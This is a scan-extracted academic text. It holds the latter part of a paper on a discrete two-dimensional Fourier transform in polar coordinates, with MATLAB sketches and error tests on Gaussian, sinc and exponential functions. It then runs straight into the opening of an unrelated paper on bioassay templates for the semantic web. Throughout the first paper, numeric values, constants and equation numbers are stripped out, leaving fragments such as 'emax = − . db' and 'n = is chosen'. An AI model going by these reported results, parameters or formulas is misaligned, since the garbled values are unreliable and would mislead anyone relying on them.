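    E = 20 * log10(abs(Ccont - Ddisc) ./ max(abs(Ddisc(:))));
end

% Average absolute round-trip error: forward then inverse transform of the
% samples fpk, compared with the original samples.  Yf, Sf, Yi, Si are the
% DHT matrices and scale factors of the two directions (assumed inputs).
function e = roundtrip_error(fpk, Yf, Sf, Yi, Si)
    fback = inverse_polar_dft(forward_polar_dft(fpk, Yf, Sf), Yi, Si);
    e = mean(abs(fpk(:) - fback(:)));
end
```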
test functions

in this section, three test functions are chosen to evaluate the ability of the discrete transform to approximate the continuous counterpart. the first test case is the circularly symmetric gaussian function. given that it is circularly symmetric and that the gaussian is continuous and smooth, the proposed dft is expected to perform well. the second test case is the "four-term sinusoid and sinc" function, which is not symmetric in the angular direction and suffers a discontinuity in the radial direction. the third test function presents a more challenging test function, the "four-term sinusoid and modified exponential" function. in this case, the test function is not circularly symmetric and it explodes at the origin (approaches infinity at the origin). given that, as shown above, the sampling grid cannot cover the area around the origin very well, a function that explodes at the origin should give more error and should provide a reasonable test case for evaluating the performance of the discrete transform. the test functions are chosen to test specific aspects of the performance of the discrete transform but also because a closed-form expression for both the function and its transform are available. this then allows a numerical evaluation of the error between the quantities computed with the 2d dft and the quantities obtained by evaluating (sampling) the continuous (forward or inverse) transform at the grid points.

gaussian

the first function chosen for evaluation is a circularly symmetric function which is gaussian in the radial direction. specifically, the function in the space domain is given by

$f(r, \theta) = e^{-a^2 r^2}$ ( )

where a is some real constant. since the function is circularly symmetric, the 2d-ft is a zeroth-order hankel transform (poularikas, ) and is given by

$F(\rho, \psi) = \frac{\pi}{a^2}\, e^{-\rho^2/(4a^2)}$ ( )

the graphs for the original function and its continuous 2d-ft (which is also a gaussian) are plotted with a = and shown in fig. .

figure: (a) original function (gaussian) and (b) its continuous 2d-dft (which is also a gaussian).

from fig. , the function is circularly symmetric and fairly smooth in the radial direction. moreover, the function can be considered as either an effectively space-limited function or an effectively band-limited function. for the purposes of testing it, it shall be considered as a space-limited function and eqs. ( ) and ( ) will be used to proceed with the forward and inverse transform in sequence. to perform the transform, the following variables need to be chosen: n , r and n . in the angular direction, since the function in the spatial domain is circularly symmetric, n can be chosen to be small. thus, n = is chosen. in the radial direction, from plotting the function, it can be seen that the effective space limit can be taken to be r = and the effective band limit can be taken to be wρ = . from eq. ( ), $j_{nN_1} \ge R\, w_\rho$ = . therefore, n = is chosen (we could also have obtained a rough estimate of n from eq. ( )). however, most of the energy of the function in both the space and frequency domains is located in the center near the origin.
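as a concrete illustration of how a test case like this one is set up, the sketch below assembles the gaussian run. the closed-form pair e^{−a²r²} ↔ (π/a²)e^{−ρ²/(4a²)} is the standard circularly symmetric gaussian pair and is assumed here because the constants above are not legible; the value of a, the space and band limits, the constraint used to pick n and the grids rpk and rhoqm (together with the dht matrices Y and scale factors S from the earlier sketches) are all placeholders rather than the paper's values.

```matlab
% Gaussian test case for the forward transform (a minimal sketch).
a  = 1;                                             % placeholder constant
f  = @(r)   exp(-a^2 .* r.^2);                      % space-domain function (circularly symmetric)
FT = @(rho) (pi / a^2) .* exp(-rho.^2 ./ (4*a^2));  % assumed closed-form 2D FT

% one way to pick the radial sample count: smallest N1 whose zeroth-order
% Bessel zero reaches R*Wrho (assumed form of the constraint quoted above)
R = 5; Wrho = 15;                                   % placeholder space and band limits
k = 0; jk = 0;
while jk < R * Wrho
    k  = k + 1;
    jk = fzero(@(x) besselj(0, x), (k - 0.25) * pi);   % refine McMahon estimate of j_{0,k}
end
N1 = k;                      % N1 would then be used to build the grids rpk, rhoqm

fpk   = f(rpk);                                     % samples on the space-domain grid
Ccont = FT(rhoqm);                                  % continuous transform at the frequency grid
Ddisc = forward_polar_dft(fpk, Y, S);               % discrete transform (earlier sketch)
E     = dynamic_error(Ccont, Ddisc);                % dB error map; large negative = accurate
```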
based on the discussion in "conclusion", relatively large values of r and wρ are needed. the effective space limit r = and effective band limit wρ = are thus chosen, which gives $j_{nN_1} \ge R\, w_\rho$ = . therefore n = is chosen in order to satisfy this constraint. both cases discussed here (n = and n = ) are tested in the following.

forward transform

test results with r = , n = are shown in figs. and . figure shows the sampled continuous forward transform and the discrete forward transform. figure shows the error between the sampled values of the continuous transform and the discretely calculated values.

figure: (a) sampled continuous transform and (b) discrete forward transform for a gaussian function with r = and n = .

from fig. , it can be observed that the error gets bigger at the center, which is as expected because the sampling grid shows that the sampling points can never attain the origin. the maximum value of the error is emax = − . db and this occurs at the center. the average error is eavg = − . db.

error test results with r = , n = are shown in fig. . similar to the previous case, the error gets larger at the center, as expected. however, the maximum value of the error is emax = − . db and this occurs at the center. the average value of the error is eavg = − . db. clearly, the test with r = , n = gives a better approximation, which verifies the discussion in "conclusion".

with r = , table shows the errors (max and average error) with respect to different values of n and n . the trends as functions of n and n are shown as plots in figs. and .

figure: error between the sampled values of the continuous transform and the discretely calculated values for a gaussian function with r = and n = .
figure: error between the sampled values of the continuous transform and the discretely calculated values for a gaussian function with r = and n = .

from fig. , it can be seen that when n individually (n is fixed at n = ) is less than the minimum of obtained from the sampling theorem, increasing n will lead to smaller errors, as expected. when n is bigger than the sampling-theorem threshold of , increasing n still decreases the error, which verifies the discussion about sample grid coverage in "conclusion". increasing n tends to increase the sample grid coverage and capture more information at the center area and thus leads to smaller errors. from fig. , increasing n alone (i.e., without a corresponding increase in n ) leads to larger errors, both errormax and erroraverage. although at first counterintuitive, this result is actually reasonable because the function is radially symmetric, which implies that n = should be sufficient based on the sampling theorem for the angular direction. therefore, increasing n will not lead to a better approximation. moreover, from the discussion of the sample grid coverage in "conclusion", the sampling grid coverage in both domains gets worse when n gets bigger because more information from the center is lost.
this problem can be solved by increasing n at the same time, but it could be computationally time consuming. therefore, choosing n properly is very important from the standpoint of accuracy and computational efficiency.

figure: error trend between the sampled values of the continuous transform and the discretely calculated values for a gaussian function, as a function of n .
table: error (db) of forward transform of gaussian function with r = , different values of n and n .

inverse transform

test results for the inverse transform with r = , n = are shown in figs. and . figure shows the sampled continuous inverse transform and discrete inverse transform and fig. shows the error between the sampled continuous and discretely calculated values.

figure: (a) sampled continuous inverse transform and (b) discrete inverse transform for the gaussian function for r = and n = .
figure: error trend between the sampled values of the continuous transform and the discretely calculated values for a gaussian function, as a function of n .

similar to the case for the forward transform, the error gets larger at the center, which is as expected because the sampling grid shows that the sampling points never attain the center. the maximum value of the error is emax = . db and this occurs at the center. the average of the error is eavg = − . db. error test results for the inverse transform with r = , n = are shown in fig. . in this case, the maximum value of the error is emax = − . db and this occurs at the center. the average of the error is eavg = − . db. table shows the errors with respect to different values of n and n , from which figs. and demonstrate the trend.

figure: error between the sampled continuous inverse transform and discrete inverse transform for the gaussian function for r = and n = .
figure: error between the sampled continuous inverse transform and discrete inverse transform for the gaussian function for r = and n = .

from fig. it can be observed that increasing n tends to improve the result but not significantly.
this could be explained by the discussion for r = , n = : with fixed r and wρ, increasing n will not allow the sampling grid in the frequency domain to get any closer to the origin to capture more information. from fig. , increasing n (with fixed n = ) leads to a worse approximation, which verifies the discussion for r = , n = .

figure: error trend between the sampled values of the continuous inverse transform and the discretely calculated values for a gaussian function, as a function of n .
table: error (db) of inverse transform of gaussian function with r = , different values of n and n .

performing sequential 2d-dft and 2d-idft results in e = . × e− , where e is calculated with eq. ( ). therefore, performing sequential forward and inverse transforms does not add much error.

four-term sinusoid & sinc function

the second function chosen for evaluation is given by

f(r, θ) = (sin(ar)/(ar)) [ sin(θ) + sin( θ) + cos( θ) + sin( θ) ] ( )

which is a sinc function in the radial direction and a four-term sinusoid in the angular direction. the graphs for the original function and the magnitude of its continuous 2d-ft with a = are shown in fig. . from fig. , the function can be considered as a band-limited function. therefore eqs. ( ) and ( ) were used to implement the forward and inverse transform. the continuous 2d-ft can be calculated from baddour ( ) as

$F(\rho, \psi) = 2\pi \sum_{n} i^{-n}\, e^{i n \psi} \int f_n(r)\, J_n(\rho r)\, r\, dr$ ( )

where f_n(r) is the fourier series of f(r, θ) and can be written as

$f_n(r) = \frac{1}{2\pi} \int_{-\pi}^{\pi} f(r, \theta)\, e^{-i n \theta}\, d\theta$ ( )

figure: error trend between the sampled values of the continuous inverse transform and the discretely calculated values for a gaussian function, as a function of n .

from the sampling theorem for the angular direction, the highest angular frequency in eq. ( ) results in n being at least required to reconstruct the signal. therefore, at least terms are required to calculate the continuous 2d-ft, which can be written in closed form as a piecewise expression ( ), with one branch for ρ < a and another for ρ > a; the branches are built from sin and cos of the four angular harmonics of ψ together with arcsin(a/ρ) terms and inverse square-root factors in ρ and a. in the angular direction, the highest frequency term in the function in the space domain is sin( θ).
from the sampling theorem, the sampling frequency should be at least twice that of the highest frequency present in the signal. thus, n = is chosen in order to go a little past the minimum requirement of . in the radial direction, from the graphs of the original function and its 2d-ft, it can be assumed that f(r, θ) is space-limited at r = and band-limited at wρ = . however, since most of the energy in the space domain is located at the origin, a relatively large band limit should be chosen based on the discussion in "conclusion". therefore, wρ = , n = are chosen.

forward transform

the error results for the forward 2d-dft of the four-term sinusoid & sinc function with wρ = , n = are shown in fig. . the discrete transform does not approximate the continuous transform very well. this is expected because the function in the frequency domain is discontinuous and the sampling points close to the discontinuity will result in a very large error. the maximum value of the error is errormax = . db and this occurs where the discontinuities are located. the average of the error is erroraverage = − . db.

figure: plots of the (a) original function (four-term sinusoid and sinc) and (b) the magnitude of its continuous forward 2d fourier transform with a = .

with wρ = , n = , table shows the errors with respect to different values of n and n , from which figs. and show the trend. from fig. , increasing n alone tends to improve the average error. the maximum error does not change with n , which is reasonable because of the discontinuity of the function in the frequency domain. from fig. , increasing n leads to errormax and erroraverage first improving and then worsening. this is reasonable because when n is less than the minimum requirement of from the sampling theorem, the test result is actually affected by both sampling point density (from the sampling theorem) and grid coverage (discussed in "conclusion"). increasing n should give better results from the point of view of the sampling theorem but worse grid coverage. the result from the combined effects is dependent on the function properties. in the specific case of this function, when n is bigger than , thereby implying that the angular sampling theorem has been satisfied, the results get worse with increasing n .

figure: error results for the forward 2d fourier transform of the four-term sinusoid & sinc function for wρ = and n = .
table: error (db) of the forward transform of the 'four-term sinusoid & sinc' function with different values of n and n .

figure: error trend between the sampled values of the continuous forward transform and the discretely calculated values for a four-term sinusoid and sinc as a function of n .
full-size doi: . /peerj-cs. /fig- figure error trend between the sampled values of the continuous forward transform and the discretely calculated values for a four-term sinusoid and sinc as a function of n . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ implying that the angular sampling theorem has been satisfied—the results get worse with increasing n . inverse transform the error results for the d-idft of four-term sinusoid & sinc function with wr ¼ , n ¼ are shown in fig. . the maximum value of the error is errormax ¼ � : db. the average of the error is erroraverage ¼ � : db. with wr ¼ , n ¼ , table shows the errors with respect to different value of n and n , from which figs. and show the trend. figure error results for the d inverse discrete fourier transform of the four-term sinusoid and sinc function for wp = and n = . full-size doi: . /peerj-cs. /fig- table error (db) of inverse transform of ‘four-term sinusoid & sinc’ function with different value of n and n . n n emax. = . emax. = . emax. = . emax. = . emax. = . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = . emax. = . emax. = . emax. = . emax. = . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = − . emax. = − . emax. = − . emax. = − . emax. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = − . emax. = − . emax. = − . emax. = − . emax. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . emax. = . emax. = . emax. = . emax. = . emax. = . eavg. = − . eavg. = − . eavg. = − . eavg. = − . eavg. = − . yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ from fig. , it can be observed that the increasing n alone improves the average error, as was expected. however, n ¼ gives an apparently worse average error than the other points. this could be caused by the discontinuity of the function in the frequency figure error trend between the sampled values of the continuous inverse transform and the discretely calculated values for a four-term sinusoid and sinc function, as a function of n . full-size doi: . /peerj-cs. /fig- figure error trend between the sampled values of the continuous inverse transform and the discretely calculated values for a four-term sinusoid and sinc function, as a function of n . full-size doi: . /peerj-cs. /fig- yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ domain. changing to n ¼ , the average error becomes − . db which proves that the large error is caused by the discontinuity. from fig. , increasing n does not lead to worse results, which is different from previous cases. however, from fig. it can be seen that the function in the frequency domain does not have much information in the center area. so, even though increasing n causes a larger hole in the center as discussed in “conclusion”, it does not lead to losing much energy which explains why fig. shows a different trend from the previous cases. performing d-dft and d-idft sequentially results in e ¼ : � e� where e is calculated by eq. ( ). 
four-term sinusoid and modified exponential

for the next test function, the function is given by

f(r, θ) = (e^(−ar)/r) [ sin(θ) + sin( θ) + cos( θ) + sin( θ) ] ( )

its continuous 2d-ft can be calculated in closed form ( ): it is a sum of four terms, one for each angular harmonic, each proportional to sin or cos of the corresponding multiple of ψ and to a factor built from powers of (√(ρ² + a²) − a)/ρ divided by √(ρ² + a²).

the graphs for the original function and the magnitude of its continuous 2d-ft with a = . are shown in fig. . from fig. , it can be observed that the function has a spike in both domains, which is a more difficult scenario based on the discussion in "conclusion". in this case, the function can be assumed to be space-limited or band-limited. this function will be tested as being space-limited.

figure: plots for (a) the original function and (b) the magnitude of its continuous 2d discrete fourier transform with a = . for a four-term sinusoid and modified exponential function.

from the graph of the original function and its 2d-dft, it can be assumed that f(r, θ) is effectively space-limited with r = , and F(ρ, ψ) is effectively band-limited with wρ = , which gives $j_{nN_1} \ge$ . this results in n = . however, since the function explodes at the center area in both domains, relatively large values of r and wρ should give a better approximation. therefore, another case with r = , wρ = is tested. in this case, n = is chosen. in the angular direction, the highest frequency term is sin( θ). from the sampling theorem, the sampling frequency should be at least twice the highest frequency of the signal. thus, n = is chosen.

forward transform

here, the function is tested as a space-limited function and eqs. ( ) and ( ) are used to proceed with the forward and inverse transform in sequence. the error results with r = , wρ = , n = are shown in fig. . the maximum value of the error is errormax = − . db and this occurs at the center area. the average of the error is erroraverage = − . db. this demonstrates that the discrete function approximates the sampled values of the continuous function quite well.

inverse transform

the error results with r = , wρ = , n = are shown in fig. . the maximum value of the error is errormax = . db and this occurs at the center. the average of the error is erroraverage = − . db. performing 2d-dft and 2d-idft results in e = . × e− , where e is calculated by eq. ( ).

figure: error between the sampled values of the continuous forward transform and the discretely calculated values for the four-term sinusoid and modified exponential function with r = , wρ = and n = .

it can be observed that even for functions with the worst properties, the proposed transform can still be used to approximate the continuous ft with fairly small errors, as long as the function is sampled properly.
summary and conclusion

accuracy and precision of the transform

the proposed discrete 2d-ft in polar coordinates demonstrates an acceptable accuracy in providing discrete estimates of the continuous ft in polar coordinates. in baddour & chouinard ( ), guizar-sicairos & gutiérrez-vega ( ) and higgins & munson ( ), the one-dimensional hankel transform of a sinc function showed similar dynamic error, which could be used as a comparative measure. since the dht is one step of the proposed discrete 2d-ft, and the definition of the hankel transform is based on abbas, sun & foroosh ( ), a similar dynamic error should be expected. the test cases showed that the transform introduced very small errors (e = . × e− for the worst case) by performing a forward transform and an inverse transform sequentially, which demonstrates that the discrete transform shows good precision.

figure: error between the sampled values of the continuous inverse transform and the discretely calculated values for the four-term sinusoid and modified exponential function with r = , wρ = and n = .
table: computing time of three cases: case : run the transform as matrices in a matrix without pre-calculating the bessel zeros; case : run the transform as dft, dht and idft in sequence without pre-calculating the bessel zeros; case : run the transform as dft, dht and idft in sequence with pre-calculating the bessel zeros.

guidelines of choosing sample size

as discussed in "conclusion" and proved by the test cases, the sample size n (sample size in the radial direction) and n (sample size in the angular direction) do not have to be of the same order. for functions with different properties, the sample sizes in the different directions could be very different. to approximate the continuous ft properly, the sample size should be chosen based on the discussion in "conclusion".

interpretation of the transform

by interpreting the transform as a 1d dft, 1d dht and 1d idft, the computing time of the transform is improved to a useful level since the fft can be used to compute the dft.

appendix: improving the computing time of the transform

one of the advantages of the traditional ft is that the computing speed is fast by using the now well-established fft algorithm. to reduce the computing time of the 2d dft in polar coordinates, the following steps are recommended:
1. interpreting the transform as three sequential operations (dft, dht, idft) instead of a single four-dimensional matrix.
2. pre-calculating and saving the bessel zeros.

reducing computing time by interpreting the transform as three operations in sequence

as explained above, the essence of the transform is that the matrix fpk is transformed into the matrix fql. the intuitive way to interpret the transform kernel is to think of it as a four-dimensional matrix, or matrices in a matrix. however, interpreting the transform as a 1d-dft of each column, a 1d-dht of each row and then a 1d-idft of each column makes it possible to use the matlab built-in functions fft and ifft, which significantly reduced the computational time.
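the comparison reported in the table above can be reproduced in outline with matlab's own timers; this is only a sketch (absolute times depend on the machine), and it assumes the three-step implementation and its inputs from the earlier sketches.

```matlab
% Rough timing of the three-step forward transform (case 2 / case 3 style),
% assuming the DHT matrices Y and scale factors S are already built.
tic;
Fqm = forward_polar_dft(fpk, Y, S);   % column DFT -> row DHT -> scaling -> column IDFT
fprintf('three-step forward transform: %.3f s\n', toc);
```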
reduce computing time by pre-calculating the bessel zeros

after defining the transform as three operations in sequence and using the matrix for the dht defined in lozier ( ), it was found that a lot of computational time was used to calculate the bessel zeros for every different test case, even though the bessel zeros are the same in every case. pre-calculating the bessel zeros and storing the results for large numbers of n and n saves a lot of time. table shows the computing time of a forward transform on the same computer (processor: intel(r) core(tm) i - hq cpu, ram: gb) for three cases:
1. evaluate the transform as matrices in a matrix without pre-calculating the bessel zeros.
2. evaluate the transform as a dft, dht and idft in sequence without pre-calculating the bessel zeros.
3. evaluate the transform as a dft, dht and idft in sequence with pre-calculating the bessel zeros.

the gaussian function was used as the test function, therefore n = and n = . from table , it can be clearly observed that the computing time by running the transform as matrices in a matrix costs , . s, which is not acceptable for the transform to be useful. testing the transform as three operations turns , . s into . s. this is much better. finally, pre-calculating the bessel zeros makes the transform much faster and applicable.
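one simple way to pre-calculate the zeros once and reuse them across test cases is sketched below using matlab built-ins only; the paper's supplemental code stores them in its own way, and the function name, the cache file and the mcmahon-plus-fzero root finding are our assumptions (a dedicated bessel-zero routine is preferable for large orders).

```matlab
% Compute the first N1 positive zeros of J_n for n = 0..M once, cache them in
% a .mat file, and reload on later runs instead of recomputing.
function zt = cached_bessel_zeros(M, N1, cachefile)
    if nargin < 3, cachefile = 'bessel_zeros_cache.mat'; end
    if isfile(cachefile)
        s = load(cachefile, 'zt');
        if size(s.zt, 1) >= M + 1 && size(s.zt, 2) >= N1
            zt = s.zt;                                    % cache already covers the request
            return;
        end
    end
    zt = zeros(M + 1, N1);
    for n = 0:M
        for k = 1:N1
            guess      = (k + n/2 - 0.25) * pi;              % McMahon estimate of j_{n,k}
            zt(n+1, k) = fzero(@(x) besselj(n, x), guess);   % refine with a root finder
        end
    end
    save(cachefile, 'zt');
end
```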
additional information and declarations

funding
this work was financially supported by the natural sciences and engineering research council of canada, grant number rgpin- - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: natural sciences and engineering research council of canada: rgpin- - .

competing interests
the authors declare that they have no competing interests.

author contributions
xueyang yao performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
natalie baddour conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.

data availability
the following information was supplied regarding data availability: sample matlab code is available as a supplemental file.

references
abbas sa, sun q, foroosh h. an exact and fast computation of discrete fourier transform for polar and spherical grid. ieee transactions on signal processing.
averbuch a, coifman rr, donoho dl, elad m, israeli m. fast and accurate polar fourier transform. applied and computational harmonic analysis.
baddour n. two-dimensional fourier transforms in polar coordinates. advances in imaging and electron physics.
baddour n. the discrete hankel transform. in: nikolic g, ed. fourier transforms: century of digitalization and increasing expectations. london: intechopen.
baddour n. discrete two-dimensional fourier transform in polar coordinates part i: theory and operational rules. mathematics.
baddour n, chouinard u. theory and operational rules for the discrete hankel transform. journal of the optical society of america a.
baddour n, chouinard u. matlab code for the discrete hankel transform. journal of open research software.
bracewell r. the fourier transform and its applications. new york: mcgraw-hill.
cooley jw, tukey jw. an algorithm for the machine calculation of complex fourier series. mathematics of computation.
dutt a, rokhlin v. fast fourier transforms for nonequispaced data. siam journal on scientific computing.
dutt a, rokhlin v. fast fourier transforms for nonequispaced data, ii. applied and computational harmonic analysis.
fahimian bp, zhao y, huang z, fung r, mao y, zhu c, khatonabadi m, demarco jj, osher sj, mcnitt-gray mf, miao j. radiation dose reduction in medical x-ray ct via fourier-based iterative reconstruction. medical physics.
fenn m, kunis s, potts d. on the computation of the polar fft. applied and computational harmonic analysis.
fessler ja, sutton bp. nonuniform fast fourier transforms using min-max interpolation. ieee transactions on signal processing.
fourmont k. non-equispaced fast fourier transforms with applications to tomography. journal of fourier analysis and applications.
guizar-sicairos m, gutiérrez-vega jc. computation of quasi-discrete hankel transforms of integer order for propagating optical wave fields. journal of the optical society of america a.
higgins w, munson d jr. an algorithm for computing general integer-order hankel transforms. ieee transactions on acoustics, speech and signal processing.
lee e, fahimian bp, iancu cv, suloway c, murphy ge, wright er, castaño-díez d, jensen gj, miao j. radiation dose reduction and image enhancement in biological imaging through equally-sloped tomography. journal of structural biology.
lewitt rm, matej s. overview of methods for image reconstruction from projections in emission computed tomography. proceedings of the ieee.
lozier dw. nist digital library of mathematical functions. annals of mathematics and artificial intelligence.
plonka g, potts d, steidl g, tasche m. numerical fourier analysis. basel: birkhäuser.
potts d, steidl g, tasche m. fast fourier transforms for nonequispaced data: a tutorial. in: benedetto jj, ferreira pjsg, eds. modern sampling theory: mathematics and applications. boston: birkhäuser boston.
poularikas ad. transforms and applications handbook. third edition. boca raton: crc press.
scott mc, chen c-c, mecklenburg m, zhu c, xu r, ercius p, dahmen u, regan bc, miao j. electron tomography at . -ångström resolution. nature.
shannon ce. communication in the presence of noise. proceedings of the ieee.
stark h. sampling theorems in polar coordinates. journal of the optical society of america.
stark h, wengrovitz m. comments and corrections on the use of polar sampling theorems in ct. ieee transactions on acoustics, speech, and signal processing.
xu y, feng d, wang lv. exact frequency-domain reconstruction for thermoacoustic tomography. i. planar geometry. ieee transactions on medical imaging.
bioassay templates for the semantic web

alex m. clark, nadia k. litterman, janice e. kranz, peter gund, kellan gregory and barry a. bunin
collaborative drug discovery, inc., burlingame, ca, united states of america

abstract
annotation of bioassay protocols using semantic web vocabulary is a way to make experiment descriptions machine-readable. protocols are communicated using concise scientific english, which precludes most kinds of analysis by software algorithms. given the availability of a sufficiently expressive ontology, some or all of the pertinent information can be captured by asserting a series of facts, expressed as semantic web triples (subject, predicate, object). with appropriate annotation, assays can be searched, clustered, tagged and evaluated in a multitude of ways, analogous to other segments of drug discovery informatics. the bioassay ontology (bao) has been previously designed for this express purpose, and provides a layered hierarchy of meaningful terms which can be linked to. currently the biggest challenge is the issue of content creation: scientists cannot be expected to use the bao effectively without having access to software tools that make it straightforward to use the vocabulary in a canonical way. we have sought to remove this barrier by: (1) defining a bioassay template (bat) data model; (2) creating a software tool for experts to create or modify templates to suit their needs; and (3) designing a common assay template (cat) to leverage the most value from the bao terms. the cat was carefully assembled by biologists in order to find a balance between the maximum amount of information captured vs. low degrees of freedom in order to keep the user experience as simple as possible. the data format that we use for describing templates and corresponding annotations is the native format of the semantic web (rdf triples), and we demonstrate some of the ways that generated content can be meaningfully queried using the sparql language. we have made all of these materials available as open source (http://github.com/cdd/bioassay-template), in order to encourage community input and use within diverse projects, including but not limited to our own commercial electronic lab notebook products.
subjects: bioinformatics, computational biology, human-computer interaction, data science
keywords: assay protocols, semantic web, bioassay ontology, common assay template, machine learning

how to cite this article: clark et al. ( ), bioassay templates for the semantic web. peerj comput. sci., doi . /peerj-cs. . submitted january , accepted april , published may . corresponding author: alex m. clark, aclark.xyz@gmail.com. academic editor: harry hochheiser. copyright clark et al., distributed under creative commons cc-by.

introduction
one of the major problems currently being faced by biologists charged with the task of performing experimental assays on pharmaceutically interesting molecules is the information burden involved with handling collections of assay descriptions. individual laboratories may carry out hundreds or even thousands of screening experiments each year. each of these experiments involves a protocol, and any two experiments may be identical, similar, or completely different. the typical practice for describing bioassay protocols, for both external communication and internal record keeping, is to use concise scientific english, which is the most universally human readable method of communication, assuming the recipient is familiar with the relevant jargon. unfortunately this method is not scalable. even given the availability of an expert, it is often quite difficult and time-consuming to read two assay description paragraphs and provide a metric for the degree to which two protocols differ. there are many workflow scenarios where comparison of protocols is necessary, e.g. searching through a collection of previous experiments, or making a judgment call as to whether two batches of small molecule measurements are comparable. attempting to use software to assist with such tasks, when the substrate is unconstrained text, results in solutions that are crude at best. while these issues with scalability could be described as a relatively minor nuisance in a small laboratory, the field of drug discovery has lately been undergoing a renaissance of open data (clark, williams & ekins, ; hersey, senger & overington, ; ecker & williams-jones, ; williams, wilbanks & ekins, ). services such as pubchem provide a truly massive resource (helal et al., ); pubchem alone provides more than a million unique bioassay descriptions, and is growing rapidly (bolton, ). it should be noted that the majority of the first million pubchem assays do not contain detailed experimental assay descriptions; contributors such as the broad institute and organizations affiliated with the molecular libraries screening center can be selected by browsing the sources: http://pubchem.ncbi.nlm.nih.gov/sources/sources.cgi. such data are supplemented by carefully curated resources like chembl (gaulton et al., ), which are much smaller but have strict quality control mechanisms in place. what these services have in common is that their bioassay protocols have very little machine-readable content. in many cases, information about the target, and the kind and units of the measurements, have been abstracted out and represented in a marked up format, but all of the remaining particulars of the protocol are ensconced within english grammar, if at all. in order to address this problem, the bioassay ontology (bao) was devised (abeyruwan et al., ; vempati et al., ); the materials for the bao can be found at http://bioassayontology.org.
the bao, which includes relevant components from other ontologies, is a semantic web vocabulary that contains thousands of terms for biological assay screening concepts, arranged in a series of layered class hierarchies. the bao is extensive and detailed, and easily extensible. the vocabulary is sufficiently expressive to be used for describing biological assays in a systematic way, yet it has seen limited use. influential projects such as pubchem (kim et al., ), chembl (willighagen et al., ), bard (de souza et al., ) and openphacts (williams et al., ) make use of the ontology, but the level of description in each is shallow, using only a small fraction of the terms. there are a number of factors holding back scientists from using the bao and related ontologies to describe their assays in detail, with perhaps the most substantial being the lack of software that makes the annotation process fast and convenient. because it is based on the semantic web, bao concepts are expressed as triples, of the form [subject, predicate, object]. there are no hard rules about how this is applied, which is a characteristic of the semantic web, and is both an asset and a liability. the simplest way to consider annotating a particular feature of an assay, e.g. the biological process, is to compose a triple of a form such as [assay id, biological process, viral genome replication]. each of these three fields is a uniform resource identifier (uri), which points to a globally unique object with established meaning. in this case, assay id would correspond to an identifier that the user has created for the assay description; biological process corresponds to a specific property in the bao that is used to link assays and the biological process that is being affected; and viral genome replication refers to a class in the bao, which identifies a specific instance of a biological process, which is in turn inherited from a sequence of increasingly general classes, and may also be linked to any other node within the greater semantic web, such as the extensive gene ontology (go) (the gene ontology consortium, ). in principle, screening biologists can use the properties and classes from the bao to annotate their assays intelligently in a machine readable format that is compatible with the universe of the semantic web. if large numbers of assays were sufficiently annotated, biologists and other drug discovery scientists could perform advanced searches and filtering that would enable better interpretation of results, enhanced building of machine-learning models, and uncovering of experimental artifacts. despite the clear benefits of semantic annotation, the bao remains largely unused, the primary reason being its lack of accessibility. the bao and its linked dependencies are large, and can be expected to keep growing as they are extended to capture more biological concepts.
in principle, screening biologists can use the properties and classes from the bao to annotate their assays intelligently in a machine-readable format that is compatible with the universe of the semantic web. if large numbers of assays were sufficiently annotated, biologists and other drug discovery scientists could perform advanced searches and filtering that would enable better interpretation of results, enhanced building of machine-learning models, and uncovering of experimental artifacts. despite the clear benefits of semantic annotation, the bao remains largely unused, the primary reason being its lack of accessibility. the bao and its linked dependencies are large, and can be expected to keep growing as they are extended to capture more biological concepts. for an interactive view onto these terms, the site http://bioportal.bioontology.org/ontologies/bao can be used to peruse the hierarchy; the bao can also be browsed and edited using software such as protégé, which can be found at http://protege.stanford.edu. figure shows two snapshots of part of the bao hierarchy, using the bioportal resource. the classes (fig. a) that make up the ontology contain the bulk of the terms and provide most of the expressive value, while the properties (fig. b) are used to provide context. the class hierarchy is in places many levels deep, and although it is arranged in a logical pattern, it is nonetheless necessary to be familiar with the entire layout in order to meaningfully annotate an assay protocol. even an expert biologist familiar with the entire ontology would be presented with multiple degrees of freedom for deciding how to annotate a protocol; this is a fundamental problem for machine readability, which requires uniform consistency. in our previous work we addressed the end-user problem, and invented technology that applies to the scenario when a user is presented with plain english text and is charged with the task of selecting the appropriate semantic annotations. our solution involved a hybrid approach that combined natural language processing with machine learning based on training data, with an intuitive interface that helps the user select the correct annotations, leaving the final choice in the hands of the scientist (clark et al., ). during this process we found that the challenge we were unable to fully overcome was the burden of creating new training data. the bao vocabulary defines thousands of classes, in addition to properties and terms from other ontologies, all of which can be expected to grow as the bao is increasingly used for more biological content. considering each term as it applies to a given assay requires a high level of expertise with the bao itself. for example, the nih's molecular libraries program's bioassay database, known as the bard, employed dedicated research staff to annotate more than two thousand assays (de souza et al., ). the absence of clear and straightforward guidance as to which terms to use under what circumstances is preventing adoption of the bao by drug discovery scientists. for our model building efforts, we made use of a training data set made up of pubchem bioassays that each had more than a hundred terms associated with them (wang et al., ; schürer et al., ), although not all of the annotations could be matched to ontology terms. for the purposes of creating additional training data, we experienced considerable difficulty finding what we considered to be canonical annotations for any given assay. the bao is essentially a vocabulary that is capable of describing many assay properties, but it lacks instructions on its use. this is an issue that we have undertaken to solve, and in this article we describe our approach to providing this critical missing component. we describe a data model called the bioassay template (bat), which consists of a small number of terms organized to describe how the bao and linked ontologies should be used to describe a particular kind of bioassay.
